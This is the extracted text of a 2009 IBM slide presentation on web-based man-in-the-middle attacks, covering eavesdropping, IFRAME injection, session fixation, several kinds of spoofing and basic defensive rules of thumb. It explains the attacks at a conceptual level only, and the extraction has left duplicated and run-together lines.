unauthorized access, men in the middle (mitm)
DESCRIPTION
In this type of attack, the attacker attempts to insert himself in themiddle of a communication for purposes of intercepting client’s data.TRANSCRIPT
1
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
By:
Balvinder Singh & Priya Nain
Unauthorized Access:
Man-in-the-Middle Attacks(MITM)
2
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
In this type of attack, the attacker attempts to insert himself in themiddle of a communication for purposes of intercepting client’s dataand could potentially modify them before discarding them or sending them out to the real destination.
The attacker makes independent connections with the victims and relaysmessages between them, making them believe that they are talking directly toEach other over a private connection, when in fact the entire conversation isControlled by the attacker.
Man-in-the-middle attacks
3
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Server
Client
Attacker
Attacker inserting himself in the middle of a communication
4
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Name Origin, The name "Man-in-the-Middle" is derived from the basketballscenario where two players intend to pass a ball to each other while one playerbetween them tries to seize it. MITM attacks are sometimes referred to as"bucket brigade attacks" or "fire brigade attacks."
MITM attack is also known as:
• Bucket-brigade attack
• Fire brigade attack
• Session hijacking
• TCP hijacking
• TCP session hijacking
• Monkey-in-the-middle attack
5
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Man-in-the-middle attacks take two common forms
• Eavesdropping, is an attacker simply listens to a set of transmissions toAnd from different hosts even though the attacker's computer isn't party to thetransaction. Many relate this type of attack to a leak, in which sensitiveinformation could be disclosed to a third party without the legitimate usersKnowledge.
• Manipulation, attacks build on the capability of eavesdropping by takingThis unauthorized receipt of a data stream and changing its contents to suit acertain purpose of the attacker-perhaps spoofing an IP address,changing a MAC address to emulate another host, or some other type ofmodification.
6
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Security Breach Example
7
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
8
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Man in the Middle Scenario
All laptop users connect to a public network
Wireless connection can easily be compromised or impersonated
Wired connections might also be compromised
InternetInternet
9
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Rules of Thumb – Don’ts …
Someone might be listening to the requests– Don’t browse sensitive sites
– Don’t supply sensitive information
Someone might be altering the responses– Don’t trust any information given on web sites
– Don’t execute downloaded code
10
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse Non-Sensitive sites
– Share personal information only over secure networks
InternetInternetNon-sensitive sites
Boring
Non-sensitive sites
Boring
Sensitive sites
Interesting
Sensitive sites
Interesting
11
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Passive Man in the Middle Attacks
Victim browses to a website
Victim browses to a website
Attacker views the requestand forwards to server
Attacker views the requestand forwards to server
Attacker views the responseand forwards to victim
Attacker views the responseand forwards to victim Server returns a response Server returns a response
Other servers are not affectedOther servers are not affected
12
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Active Man in the Middle Attack
The attacker actively directs the victim to an “interesting” site The IFrame could be invisible
Victim browses to a “boring” site
Victim browses to a “boring” site
Attack transfers the request to the
server
Attack transfers the request to the
server
Attacker adds an IFRAME referencing an “interesting” site
Attacker adds an IFRAME referencing an “interesting” site Server returns a response Server returns a response
My Weather ChannelMy Weather Channel
My Bank SiteMy Bank Site
Automatic request sent to the interesting server
Automatic request sent to the interesting server
My Bank SiteMy Bank Site
Other servers are not affectedOther servers are not affected
13
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
14
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Secure Connections
Login Mechanism
15
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Session Fixation
Cookie is being saved on victim’s computer
Cookie is being saved on victim’s computer
Attacker redirects victim to the site of interest
Attacker redirects victim to the site of interest
Attacker returns a page with a cookie generated by server
Attacker returns a page with a cookie generated by server
A while later,victim connects to the site
(with the pre-provided cookie)
A while later,victim connects to the site
(with the pre-provided cookie)
Attacker uses the same cookie to connect to the server
Attacker uses the same cookie to connect to the server
Server authenticates attacker as victim
Server authenticates attacker as victim
Result– Now server authenticate attacker as
victim/client, now attacker has same privileges as our victim have.
16
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Attack strategy – Spoofing
Spoofing is the creation of TCP/IP packets using somebody else's IP address.Routers use the "destination IP" address in order to forward packets throughThe Internet, but ignore the "source IP" address. That address is onlyused by the destination machine when it responds back to the source.
An example from cryptography is the Man in the middle Attack,in which an attacker spoofs Alice into believing the attacker is Bob,and spoofs Bob into believing the attacker is Alice,thus gaining access to all messages in both directions without the trouble ofAny cryptanalytic effort.
17
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
• E-Mail address Spoofing
Types of Spoofing
• URL Spoofing and Phishing
• Referrer Spoofing
18
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
URL spoofing and phishing,
Another kind of spoofing is "webpage spoofing” also known as Phishing.In this attack, a legitimate web page such as a bank's site is reproduced in"look and feel" on another server under control of the attacker.The main intent is to fool the users into thinking that they are connected toa trusted site, for instance to harvest usernames and passwords.
Referrer spoofing,
Some websites, especially pay sites, allow access to their materials onlyfrom certain approved (login-) pages. This is enforced by checking thereferrer header of the HTTP request.
19
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
The sender information shown in E-Mails (the "From" field) can bespoofed easily. This technique is commonly used by spammers to hidethe origin of their e-mails and leads to problems such as misdirected Bounces.
Like attacker send a message to user by changing its ‘From' field and userThink that message is received by an trusted person and he may reply to thatMessage and our data may be misused.
E-mail address spoofing
20
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
Defending against Spoofing
Spoofing is difficult to defend against due to the attacks being mostlypassive by nature.
• What you get is a webpage that is different than what you are expecting.
In very targeted attacks it is very possible that you may never knowthat attackers have been entered into your system
• By using virtual proxy generator
• By using login mechanism
21
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
22
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation